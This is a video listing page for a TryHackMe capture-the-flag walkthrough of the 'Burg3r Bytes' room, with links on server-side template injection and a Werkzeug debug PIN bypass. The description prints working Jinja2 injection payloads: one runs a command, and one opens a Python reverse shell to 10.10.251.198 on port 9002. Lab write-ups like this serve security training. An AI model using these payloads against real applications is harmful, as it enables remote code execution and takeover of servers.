Back to Browse

TryHack3M: Burg3r Bytes TryHackMe walk through

764 views
Apr 23, 2024
58:11

🍔 They say these burgers are worth every penny. Can you buy one? Room link: https://tryhackme.com/r/room/burg3rbytes 🍔🍔 SSTI (Server Side Template Injection) https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection 🍔🍔 Werkzeug Debug Console Pin Bypass https://github.com/wdahlenburg/werkzeug-debug-console-bypass 🍔🍔 RCE: {{ cycler.__init__.__globals__.os.popen('id').read() }} 🍔🍔 reverse shell: {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.251.198\",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'")}}{%endif%}{% endfor %} 🍔🍔 #tryhackme

Download

0 formats

No download links available.

TryHack3M: Burg3r Bytes TryHackMe walk through | NatokHD